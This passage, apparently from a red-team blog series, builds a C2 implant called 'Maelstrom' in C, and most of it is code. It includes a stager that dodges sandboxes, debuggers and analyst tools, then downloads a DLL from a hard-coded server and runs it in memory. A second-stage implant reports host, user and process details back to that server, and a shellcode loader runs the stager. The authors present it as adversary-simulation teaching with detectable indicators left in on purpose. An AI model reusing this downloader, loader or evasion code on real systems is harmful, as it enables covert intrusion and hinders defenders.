    LPVOID VirtualProtect;
    LPVOID VirtualAlloc;
    LPVOID CreateThread;
    LPVOID WaitForSingleObject;
    LPVOID VirtualFree;
}
API, * PAPI;

In the case of LoadLibraryA:

typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR lpLibFileName);
CHAR cLoadLibraryA[13] = { 'L', 'o', 'a', 'd','L','i','b','r','a','r','y','A',0 };
Api->LoadLibraryA = GetSymbolAddress(hKernel32, cLoadLibraryA);

Then using it:

CHAR cWinHTTP[8] = { 'w','i','n','h','t','t','p',0 };
HMODULE hWinHttp = ((LOADLIBRARYA)api.LoadLibraryA)(cWinHTTP);

Now onto the stager!

Quick recap of Stage 0. Before running malicious code on a host to get an implant, some initial enumeration and checks are put in place. For an Adversary Simulation exercise, this keeps the attackers within scope, whilst also ensuring that the implant is only executed when it is safe to do so.

Additionally, this entry point will be entirely position independent, meaning that all of the code lives within the .text section. This allows the opcodes to be extracted, giving shellcode that can be executed by other methods.

Note: Position Independent Code will not be discussed at length within this post. It is recommended to read Executing Position Independent Shellcode from Object Files in Memory.

Functionality

In this section, we want to discuss some functionality that can be added to a stage 0. Obviously, it doesn't ALL need to go in; these are just some things we found interesting and/or useful.

Environmental Keying

First up, Environmental Keying, or Guardrailing. This has two purposes:

  • If the Environmental information embedded in the stager does not match what was enumerated, then return.

  • Encrypt the stage 1 DLL with some information obtained from the environment, and decrypt it at runtime.

The second point can be completely automated. This is not something done in Maelstrom, but it is easy to send some information back to the C2 and have it encrypt the DLL with that information before returning it to the stager.

As far as methods of doing this go, there are a ton, and quite frankly it's down to creativity. A few examples can be shown here:

An even easier method is to use something like GetComputerNameW or GetUserNameW. This is pretty basic, and a combination of these types of calls could be used.

In the case of Maelstrom, we simply hash the computername and check it with this function:

BOOL IsCorrectEnvironment(API api) {
    WCHAR wHostname[MAX_COMPUTERNAME_LENGTH + 1]; // room for the terminator
    DWORD dwSz = MAX_COMPUTERNAME_LENGTH + 1;     // size in characters, not bytes

    if (((GETCOMPUTERNAMEW)api.GetComputerNameW)(wHostname, &dwSz)) {
        if (Djb2HashW(wHostname) == HOSTNAME_HASH) {
            return TRUE;
        }
    }
    return FALSE;
}

Which is called like so:

if (IsCorrectEnvironment(Api) == FALSE) {
    return FALSE;
}

To see how to AES-256 encrypt a payload using this technique, read Greta: Windows Crypto, and Recursive Keying. Maelstrom will not make use of this, as it is purely a proof-of-concept.

So, back to the keying. If the computer name doesn't match, the check returns FALSE and the stager exits with -1. Otherwise, it moves on.

Detecting Suspicious Processes

This is a fun one: it adds an extra layer of hindrance for blue teams. It's quite simple: if a listed process is found, exit. In the following example only one process is checked for, but it's no extra effort to loop over a bunch:

BOOL AreSuspiciousProcessesRunning(API Api) {
    HANDLE hSnapshot;
    PROCESSENTRY32W pe32;

    hSnapshot = ((CREATETOOLHELP32SNAPSHOT)Api.CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32W);

    BOOL bFound = FALSE;

    if (((PROCESS32FIRSTW)Api.Process32FirstW)(hSnapshot, &pe32)) {
        do {
            if (Djb2HashW(pe32.szExeFile) == PROCESS_HACKER_HASH) {
                bFound = TRUE;
                break;
            }
        } while (((PROCESS32NEXTW)Api.Process32NextW)(hSnapshot, &pe32));
    }

    // Close the snapshot handle on every path, not only when nothing matched
    ((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
    return bFound;
}

Loop over all processes; if the hash of a process name matches the one defined, return TRUE. In this case, it is ProcessHacker.exe:

#define PROCESS_HACKER_HASH 0xda24bd3c

This is executed like so:

if (AreSuspiciousProcessesRunning(Api)) {
    return FALSE;
}

Anti-Sandbox

Sandboxes are a great way to automate the process of identifying what a piece of malware does. Essentially, they run malware inside an isolated virtual machine, watch its behaviour, and report on it.

Commonly, these are small virtual machines with a limited amount of time to spend on each sample. Some common solutions to handling sandboxes:

  • Waiting for the expiration time (usually 180 seconds)

  • Only executing if not in a virtual machine

  • Only executing if a disk size is above a certain threshold

These are just a few to consider. In the case of Maelstrom, we simply check that the RAM size is greater than 4 GB:

BOOL IsInSandbox(API Api) {
    MEMORYSTATUSEX memStatus;

    memStatus.dwLength = sizeof(memStatus);

    ((GLOBALMEMORYSTATUSEX)Api.GlobalMemoryStatusEx)(&memStatus);
    float fSz = (float)memStatus.ullTotalPhys / (1024 * 1024 * 1024);
    if (fSz > 4) {
        return FALSE;
    }
    return TRUE;
}

If this function returns FALSE, then we continue.

Combined with a sleep:

void InternalSleep(API Api, DWORD DwSleep) {
    ((SLEEP)Api.Sleep)(DwSleep);
}

Anti-Debug

Anti-Debug, again, is about creativity. Repos such as LordNoteworthy/al-khaser contain loads of examples of this; however, Maelstrom keeps this simple:

BOOL IsBeingDebugged() {
    PPEB pPeb = (PPEB)PPEB_PTR;

    if (pPeb->BeingDebugged == 1) {
        return TRUE;
    }
    else {
        return FALSE;
    }
}

Read the PEB struct and check if BeingDebugged is set to 1. Simple. Looking at the AntiDebug section of al-khaser there are tons of methods; just implement these as and when needed.

These techniques are useful for hindering blue teams if the payload is retrieved: they slow down analysts trying to identify the purpose of the malware, as well as the server behind it. This should not be the only line of defence. For example, if the implant is debugged and the IPs of the server are found, there should be server-side protections to control which implants are allowed to communicate with the server.

Downloading the Reflective DLL

For this, we will use WinHTTP, as the code is ready and accessible. WinINet is the other common option for HTTP on Windows. For readability of the code, the following struct is defined:

typedef struct DLL_ {
    LPVOID Buffer;
    DWORD Size;
}
DLL, * PDLL;

And then passed into the function:

BOOL GetReflectiveDLL(API api, PDLL Dll)

We'll get to that shortly. But first, the config of the request is defined:

WCHAR wVerb[4] = {
  'G', 'E', 'T', 0
};

WCHAR wEndpoint[9] = {
  '/', 'a', '?', 's', 't', 'a', 'g', 'e', 0
};

WCHAR wUserAgent[10] = {
  'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', 0
};

WCHAR wVersion[9] = {
  'H', 'T', 'T', 'P', '/', '1', '.', '1', 0
};

WCHAR wServer[13] = {
  '1', '0', '.', '1', '0', '.', '1', '1', '.', '2', '0', '5', 0
};

WCHAR wReferer[19] = {
  'h', 't', 't', 'p', 's', ':', '/', '/', 'g', 'o', 'o', 'g', 'l', 'e', '.', 'c', 'o', 'm', 0
};

WCHAR wHeaders[22] = {
  'X', '-', 'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', ':', ' ', 'p', 'a', 's', 's', 'w', 'o', 'r', 'd', 0
};

These strings are hard-coded in the function, which does not support any sort of update. The password that the server requires is also hard-coded in the header. Finally, the strings are written as character arrays so that they are placed within the .text section.

We now create a few variables, including the port:

DWORD dwPort = 5555;
BOOL bSSL = FALSE;
BOOL bProxy = FALSE;

DWORD dwSz = 0;
DWORD dwDownloaded = 0;
DWORD dwTotalRead = 0;
long lpBuffer = -1;
DWORD lpdwBufferLength = sizeof(lpBuffer);
BOOL bSetOptions = FALSE;

DWORD dwFlagsWinHttpOpenRequest = 0;
DWORD dwAllowBadCerts = 0;

HINTERNET hSession = NULL;
HINTERNET hConnect = NULL;
HINTERNET hRequest = NULL;
BOOL bSentRequest = FALSE;
BOOL bReceieveRequest = FALSE;
BOOL bHeadersQueried = FALSE;
BOOL bHeadersAdded = FALSE;
WINHTTP_AUTOPROXY_OPTIONS autoProxyOptions;
WINHTTP_PROXY_INFO proxyInfo;
DWORD dwProxyInfoSz = sizeof(proxyInfo);

We aren't going to step through the code, but there are a few things to point out.

If it's SSL, set these flags:

if (bSSL) {
    dwFlagsWinHttpOpenRequest = WINHTTP_FLAG_SECURE;
    dwAllowBadCerts = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
}

And:

if (bSSL) {
    bSetOptions = ((WINHTTPSETOPTION)api.WinHttpSetOption)(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwAllowBadCerts, sizeof(dwAllowBadCerts));
    if (bSetOptions == FALSE) {
        return FALSE;
    }
}

Then, this is how headers are added:

bHeadersAdded = ((WINHTTPADDREQUESTHEADERS)api.WinHttpAddRequestHeaders)(hRequest, (LPCWSTR)&wHeaders, (DWORD)-1, WINHTTP_ADDREQ_FLAG_REPLACE | WINHTTP_ADDREQ_FLAG_ADD);
if (bHeadersAdded == FALSE) {
    return FALSE;
}

If multiple headers are required, they need to be in the same WCHAR string, with each header except the last terminated by a carriage return and line feed (\r\n).
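WinHttpAddRequestHeaders expects each header except the last to be terminated by CR/LF. As a rough sketch of building such a string, the hypothetical helper below joins header lines into one buffer. The name join_headers and the second header in the usage note are our own illustrations, and in a position-independent stager the wcslen and wcscpy calls would need replacing with local implementations:

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>

/* Joins `count` header lines into `out`, separated by CRLF.
 * Returns the number of characters written (excluding the terminator),
 * or 0 if `out` is too small. */
static size_t join_headers(wchar_t *out, size_t out_len,
                           const wchar_t *const *headers, size_t count)
{
    assert(out != NULL && headers != NULL);
    size_t used = 0;
    if (out_len == 0) {
        return 0;
    }
    out[0] = L'\0';
    for (size_t i = 0; i < count; i++) {
        size_t len  = wcslen(headers[i]);
        size_t need = len + (i + 1 < count ? 2 : 0); /* CRLF between headers only */
        if (used + need + 1 > out_len) {
            out[0] = L'\0';
            return 0;
        }
        wcscpy(out + used, headers[i]);
        used += len;
        if (i + 1 < count) {
            out[used++] = L'\r';
            out[used++] = L'\n';
            out[used]   = L'\0';
        }
    }
    return used;
}
```

Joining L"X-Maelstrom: password" and L"Accept: */*" this way produces a single 34-character string with one \r\n between the two headers and none after the last.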

After the request is done, we fill the structure:

Dll->Buffer = Buffer;
Dll->Size = dwTotalRead;

if (Dll->Size > 0) {
    return TRUE;
}
else {
    return FALSE;
}

The entire process is encapsulated in the following call:

if (GetReflectiveDLL(Api, &Dll) == FALSE) {
    return -1;
}

Loading a Reflective DLL

In the stage 1 section we will discuss why a Reflective DLL was chosen and what it is, but for now let's discuss how it will be loaded. For reference, here is the code used to execute the DLL:

int LoadReflectiveDll(API Api, DLL Dll) {
    LPVOID pAddress = NULL;
    DWORD lpflOldProtect = 0;
    BOOL bProtect = FALSE;
    DWORD dwLdrOffset = 0;
    PTHREAD_START_ROUTINE pRoutine = NULL;
    HANDLE hThread = NULL;

    pAddress = ((VIRTUALALLOC)Api.VirtualAlloc)(0, Dll.Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (pAddress == NULL) {
        return 1;
    }

    Memcpy(pAddress, Dll.Buffer, Dll.Size);

    bProtect = ((VIRTUALPROTECT)Api.VirtualProtect)(pAddress, Dll.Size, PAGE_EXECUTE_READ, &lpflOldProtect);
    if (bProtect == FALSE) {
        return 1;
    }

    dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
    if (dwLdrOffset == 0) {
        return 1;
    }

    pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

    hThread = ((CREATETHREAD)Api.CreateThread)(NULL, 0, pRoutine, NULL, 0, NULL);
    if (hThread == NULL) {
        return 1;
    }
    ((WAITFORSINGLEOBJECT)Api.WaitForSingleObject)(hThread, INFINITE);

    ((VIRTUALFREE)Api.VirtualFree)(pAddress, 0, MEM_RELEASE);
    return 0;
}

memcpy is reimplemented using the source code:

void * Memcpy (void *dest, const void *src, size_t len)
{
  char *d = dest;
  const char *s = src;
  while (len--)
    *d++ = *s++;
  return dest;
}

We discussed this earlier on, but let's revisit. We first need to identify the offset of the exported function within the buffer, so that we can compute the address on which to start a thread:

dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
if (dwLdrOffset == 0) {
    return 1;
}

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

Let's go over the GetReflectiveLoaderOffset() function.

The function is declared like so:

DWORD GetReflectiveLoaderOffset(VOID* lpReflectiveDllBuffer)

The parameter taken here is a pointer to the buffer containing the DLL retrieved from the server.

First things first, define the exported function name:

CHAR cReflectiveLoader[17] = {
    'R', 'e', 'f', 'l', 'e', 'c', 't', 'i', 'v', 'e', 'L', 'o', 'a', 'd', 'e', 'r', 0
};

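With that, the next step is to read the IMAGE_DOS_HEADER at the start of the buffer and follow its e_lfanew field to the NT headers (despite its name, uExportDirectory holds the address of the NT headers at this point):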

uExportDirectory = uBase + ((PIMAGE_DOS_HEADER)uBase)->e_lfanew;

The struct:

typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

From here, the IMAGE_NT_HEADERS are read and the OptionalHeader.Magic value is checked against the architecture the stager was compiled for:

if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x010B) // PE32
{
    if (dwCompiledArch != 1)
        return 0;
}
else if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x020B) // PE64
{
    if (dwCompiledArch != 2)
        return 0;
}
else
{
    return 0;
}

The struct:

typedef struct _IMAGE_NT_HEADERS64 {
  DWORD                   Signature;
  IMAGE_FILE_HEADER       FileHeader;
  IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

Extract the export directory, the virtual addresses, and so on:

uEntryExport = (UINT_PTR) & ((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
uExportDirectory = uBase + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uEntryExport)->VirtualAddress, uBase);
uEntryExport = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNames, uBase);
uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
uOrdinals = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNameOrdinals, uBase);
dwNumberOfNames = ((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->NumberOfNames;

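And then loop over all the exported function names. Because the DLL is still in its raw on-disk layout rather than mapped into memory, each RVA has to be converted to a file offset first: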

char* exportedFunction = (char*)(uBase + Rva2Offset(DEREF_32(uEntryExport), uBase));

Where Rva2Offset() is:

DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
{
    WORD wIndex = 0;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeaders = NULL;

    pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

    pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

    if (dwRva < pSectionHeader[0].PointerToRawData)
        return dwRva;

    for (wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
    {
        if (dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData))
            return (dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData);
    }

    return 0;
}
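To see the conversion with concrete numbers, here is a portable sketch of the same logic over a hand-written section table. The Section struct, rva_to_offset(), and the sample layout are hypothetical; the real code reads IMAGE_SECTION_HEADER entries out of the buffer instead:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, trimmed-down section header holding only the three fields
 * the conversion needs (the real IMAGE_SECTION_HEADER has more). */
typedef struct {
    uint32_t VirtualAddress;   /* where the section starts once mapped   */
    uint32_t SizeOfRawData;    /* how many bytes it occupies in the file */
    uint32_t PointerToRawData; /* where the section starts in the file   */
} Section;

/* Translate an RVA to a file offset; returns 0 if no section contains it. */
static uint32_t rva_to_offset(uint32_t rva, const Section *s, size_t count)
{
    assert(s != NULL && count > 0);
    /* RVAs inside the headers are identical on disk and in memory. */
    if (rva < s[0].PointerToRawData) {
        return rva;
    }
    for (size_t i = 0; i < count; i++) {
        if (rva >= s[i].VirtualAddress &&
            rva <  s[i].VirtualAddress + s[i].SizeOfRawData) {
            return rva - s[i].VirtualAddress + s[i].PointerToRawData;
        }
    }
    return 0;
}

/* Sample layout: sections 0x1000 apart in memory but packed tightly on disk. */
static const Section kSections[] = {
    { 0x1000, 0x400, 0x400 }, /* .text  */
    { 0x2000, 0x200, 0x800 }, /* .rdata */
};
```

With this table, RVA 0x1010 falls 0x10 bytes into .text and maps to file offset 0x410, while RVA 0x2004 maps to 0x804. An RVA of 0x5000 belongs to no section and returns 0, which callers should treat as a failure.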

Then, using a custom strstr, compare the export name with the one we hardcoded at the start:

if (STRSTR(exportedFunction, cReflectiveLoader) != NULL)
{
    uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
    uAddress += (DEREF_16(uOrdinals) * sizeof(DWORD));
    return Rva2Offset(DEREF_32(uAddress), uBase);
}

At this point, there should be some clear OpSec issues. If they're not obvious, we will point them out in the next few sections!

Once this is done and the address of the exported function has been obtained, we can simply start a thread on it:

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

hThread = ((CREATETHREAD)Api.CreateThread)(NULL, 0, pRoutine, NULL, 0, NULL);
if (hThread == NULL)
{
    return 1;
}
((WAITFORSINGLEOBJECT)Api.WaitForSingleObject)(hThread, INFINITE);

Aside from the glaring IOC here, there is one missing WinAPI call which would operate as a cleanup... More on that in the OpSec review posts.

Maelstrom's Entry-point

This is currently how the stager looks:

int run() {

    API Api = {
        0
    };

    DLL Dll = {
        0
    };

    if (ResolveAPIs(&Api) == FALSE) {
        return -1;
    }

#ifdef SAFE
    if (SafetyChecks(Api) == FALSE) {
        return -1;
    }
#endif

    if (GetReflectiveDLL(Api, &Dll) == FALSE) {
        return -1;
    }

    LoadReflectiveDll(Api, Dll);

    return 0;
}

We deem this the safe version, as it has all the checks we discussed. As SAFE is a preprocessor definition, we can control whether or not it's used by passing the -DSAFE flag to MinGW.

The makefile:

CC         =   x86_64-w64-mingw32-gcc
LINKER      =   x86_64-w64-mingw32-ld
OBJCOPY     =   x86_64-w64-mingw32-objcopy
FLAGS       =   -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c
LINKERFLAGS =   -Wl,-Tscripts/linker.ld,--no-seh
SAFE        =   bin/maelstrom.safe.x64
UNSAFE      =   bin/maelstrom.unsafe.x64
SOURCE      =   $(wildcard src/*.c)

safe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) -DSAFE $(LINKERFLAGS) -o $(SAFE).o

    $(LINKER) -s bin/adjuststack.o $(SAFE).o -o $(SAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(SAFE).exe $(SAFE).bin

    rm bin/*.o

unsafe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) $(LINKERFLAGS) -o $(UNSAFE).o

    $(LINKER) -s bin/adjuststack.o $(UNSAFE).o -o $(UNSAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(UNSAFE).exe $(UNSAFE).bin

    rm bin/*.o

For the eagle-eyed, this is fully position-independent and we can show this at the end of the post.

Stage 1

Stage 1, or Maelstrom.x64.dll, is the actual implant. As tempting as it is to use a typical PE and operate out of main, it's probably best not to. Tools such as sRDI or Donut work by bootstrapping the PE. To avoid this, and any other complication, we found a Reflective DLL to be the most effective and the easiest to work with.

Custom Reflective Loader

As we discussed earlier on, Stephen Fewer provided the first proof-of-concept of Reflective DLLs. Since then, the community has developed a few iterations:

For our demonstration, we will use the original proof-of-concept as this uses common IOCs which we want to keep in the project to ensure that Maelstrom is easily detectable.

DLLMain

Once the DLL has been loaded by Stage 0, DllMain will be called:

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    HANDLE hThread = NULL;
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:

#ifndef _DEBUG
        hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Maelstrom, NULL, 0, NULL);
        if (hThread != NULL) {
            CloseHandle(hThread);
        }
#endif

    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}

When the DLL load reason is DLL_PROCESS_ATTACH, a new thread is created on Maelstrom() which looks like this:

DWORD WINAPI Maelstrom()
{
    // Gather initial info
    PCHAR machineInfo = GetMachineInfo();

    // Check-in
    if (Initialise(machineInfo) == FALSE)
    {
        return -1;
    }

    // do some commands
    Start();

    return 0;
}

DLL Debugging

To debug this in Visual Studio, the preprocessor definition _DEBUG is checked. If it's not present, the thread is created as normal. Otherwise, this function is exported instead:

#ifdef _DEBUG
DLLEXPORT void DebugExport()
{
    Maelstrom();
}
#endif

And a separate loader was written to debug it:

#include <Windows.h>

typedef void (*DebugExport)();

int main(int argc, char* argv[])
{
    HMODULE hModule = LoadLibraryA("maelstrom.1.dll");
    if (hModule == NULL) return 1;

    DebugExport f = reinterpret_cast<DebugExport>(GetProcAddress(hModule, "DebugExport"));
    if (f == NULL) return 1;

    f();
    return 0;
}

We found this to be a cleaner debugging experience than messing with x64dbg.

Checking In

As soon as the implant is launched, the first thing to occur is some basic enumeration which will identify the host:

char* GetMachineInfo()
{
    CHAR lpProcessName[MAX_PATH];
    CHAR lpComputerName[MAX_PATH];
    CHAR lpUserName[MAX_PATH];
    DWORD nSize = MAX_PATH;

    if (!GetComputerNameA(lpComputerName, &nSize))
    {
        return NULL;
    }

    nSize = MAX_PATH; // GetComputerNameA overwrote nSize with the name length
    if (!GetUserNameA(lpUserName, &nSize))
    {
        return NULL;
    }

    if (!GetModuleFileNameA(NULL, lpProcessName, MAX_PATH))
    {
        return NULL;
    }

    DWORD dwPid = GetCurrentProcessId();

    char* data = malloc(MAX_PATH * 5);

    if (!data)
    {
        return NULL;
    }

    sprintf(data,
        "{ \"init\": {\"processname\": \"%s\", \"computername\": \"%s\", \"username\": \"%s\", \"dwpid\": \"%lu\"}}",
        lpProcessName, lpComputerName, lpUserName, dwPid);

    Xor(data, strlen(data), 0xff);

    return data;

}

In the code above, the process name, computer name, and username are packed into a JSON string, along with the process ID. This is just XOR'd with a hard-coded single-byte key as a proof-of-concept. In a production C2, this should be encrypted with something like AES-256-CBC or an equivalent algorithm. As this is an example project, we skip this step.
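Two details of this step are worth a sketch. First, GetModuleFileNameA returns a path containing backslashes, which must be escaped before being placed in a JSON string, otherwise the server's parser may reject it. Second, a single-byte XOR is its own inverse, so anyone who sees the traffic can undo it. The helper names json_escape and xor_buffer below are hypothetical; they are not the Xor() used by Maelstrom, whose implementation is not shown in this post:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies `src` into `dst`, escaping backslashes and double quotes so the
 * result is safe inside a JSON string. Returns 0 on success, -1 if `dst`
 * is too small. Control characters are not handled in this sketch. */
static int json_escape(char *dst, size_t dst_len, const char *src)
{
    assert(dst != NULL && src != NULL);
    size_t o = 0;
    for (; *src != '\0'; src++) {
        size_t need = (*src == '\\' || *src == '"') ? 2 : 1;
        if (o + need + 1 > dst_len) {
            return -1;
        }
        if (need == 2) {
            dst[o++] = '\\';
        }
        dst[o++] = *src;
    }
    if (o + 1 > dst_len) {
        return -1;
    }
    dst[o] = '\0';
    return 0;
}

/* Single-byte XOR over a buffer. Applying it twice with the same key
 * restores the input, which is why it is obfuscation and not encryption. */
static void xor_buffer(unsigned char *buf, size_t len, unsigned char key)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= key;
    }
}
```

Note that the length is passed explicitly. Once a buffer has been XOR'd it may contain zero bytes, so strlen can no longer be trusted on it and the original length should be captured before the transform.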

This is something discussed in Maelstrom: Building the Team Server: making the data sent between client and server difficult to read. Whether it's layers of encryption or masking data as a MAC address, we highly recommend that something is done to transform the data. For this demo, we don't care about any of that, so it's just sent to the Initialise() function:

// Gather initial info
char* machineInfo = GetMachineInfo();

// Check-in
if (Initialise(machineInfo) == FALSE)
{
    return -1;
}

Which is just a wrapper around the SendRequestA() function:

BOOL Initialise(char* machineInfo)
{
    if (SendRequestA(machineInfo))
    {
        return TRUE;
    }
    else
    {
        return FALSE;
    }
}

The SendRequestA() function uses WinHTTP and relies on a bunch of WinAPI calls. So, let's get into the configuration of the requests.

Similarly to stage 0, the config is hard-coded:

LPCWSTR wVerb = L"GET";
LPCWSTR wEndpoint = L"/a";
LPCWSTR wUserAgent = L"Maelstrom";
LPCWSTR wVersion = L"HTTP/1.1";
LPCWSTR wServer = L"10.10.11.205";
LPCWSTR wReferer = L"https://google.com";
LPCWSTR wHeaders = L"X-Maelstrom: password";

And some additional config:

int port = 5555;
BOOL bSsl = FALSE;
BOOL bProxy = FALSE;

Again, to repeat ourselves, do not leave these hard-coded.

Once it has initialised, we hit Start():

void Start()
{
    printf("Starting...\n");
    BOOL bRun = TRUE;

    while (bRun)
    {
        // Pick a simulated task (0-3) on every pass; rand() % 4 + 1 would never hit case 0
        DWORD dwOp = rand() % 4;

        switch (dwOp)
        {
        case 0:
            printf("Simulating Task: 0\n");
            Sleep(5000);
            break;
        case 1:
            printf("Simulating Task: 1\n");
            Sleep(5000);
            break;
        case 2:
            printf("Simulating Task: 2\n");
            Sleep(5000);
            break;
        case 3:
            printf("Simulating Task: 3\n");
            Sleep(5000);
            break;
        }
        printf("Sleeping...\n");
        Sleep(10000);
    }
}

This is our simulation of tasking. Essentially it is operating as the component of the implant which will check, run, and return tasks. We are not providing that functionality though.

Safe Sleeping

One important consideration is how the implant looks in memory between operations. If the implant is just idling with nothing to do, it should sleep in such a way that memory scanners or engineers cannot easily identify it as malicious. This is something we will look at more in the runtime analysis, but let's take a quick look. If Process Hacker is used and the RWX region identified, this is how the region looks:

In the above, we can see the MZ header, the DOS message, and various section names. This needs to be removed, but we will not be providing a solution as we want to align with the objectives we set out in section one. We will, however, offer some example projects for the enthusiastic reader:

On May 5th 2022, Austin Hudson posted a tweet with a blog: Studying “Next Generation Malware” - NightHawk’s Attempt At Obfuscate and Sleep

This blog went through how Austin was able to identify a sample of Nighthawk, a proprietary C2 from the UK-based cyber security consultancy MDSec. In the post, Austin discusses how the technique uses thread contexts and callbacks to flip the memory region's permissions (which we will discuss further in later posts).

For clarity, the research behind this technique at MDSec was carried out by Peter Winter-Smith and modexp.

Once the proof-of-concept was made public by Austin, C5pider built it out into an open-source tool called Ekko. However, this proof-of-concept uses the base address of the entire image as the region to protect, which only works when the malware is the entire EXE on disk or is loaded as a proper DLL. This can be seen on line 36:

ImageBase   = GetModuleHandleA( NULL );

In the event that malware wants to load the implant entirely through memory, as with a Reflective DLL, this technique will not work: GetModuleHandleA(NULL) returns the base address of the host process image, not of the DLL. For example, if the DLL is reflectively loaded into calc.exe, GetModuleHandleA will return the base of calc.exe.

Producing Shellcode for Loaders and Droppers

As stage 0 is already position independent and the build generates both an exe and a bin for each stage 0 type, we can easily get a C array from the bin with:

xxd -i maelstrom.x64.unsafe.bin > shellcode.h

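This produces the following (xxd names the array after the input file; it is shown here renamed to shellcode_bin):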

unsigned char shellcode_bin[] = {
  /* Too Long */
};
unsigned int shellcode_bin_len = 5248;

This can then be loaded with:

#include <stdio.h>
#include <windows.h>
#include "shellcode.h"

int main()
{
    LPVOID pAddress = VirtualAlloc(nullptr, shellcode_bin_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pAddress, shellcode_bin, shellcode_bin_len);
    HANDLE hThread = CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)pAddress, nullptr, 0, nullptr);
    Sleep(10000);
    return 0;
}

Instead of calling WaitForSingleObject on the thread, we use a Sleep in the above, because the shellcode creates a new thread and exits once the RDLL is loaded, so the thread we would be waiting on exits successfully straight away. For demonstration purposes, we just sleep.

Bear in mind that with SAFE defined, the size goes up to 8192.

To see how Metasploit got their payload so small, see block_reverse_https.asm and the build script at build.py.

Now that the shellcode has been produced and is loadable, it can be wrapped in any shellcode loader:

  • .NET

  • Go

  • Rust

  • Nim

You name it, it should work!

Conclusion

At long last, we finally have some code that runs, and a plan for more functionality and security. There are manifold ways to progress the implant from here, from improving the implant's operational security to fleshing out its communication channels.

This blog post has been pretty heavily in favour of the offense, and light on operational security. As we've discussed, defensive techniques such as hooking AMSI and ETW TI present a potent limitation on the operational security of the implant. Our next two posts will look at these protections, how they work, and how an implant can attempt to bypass them.
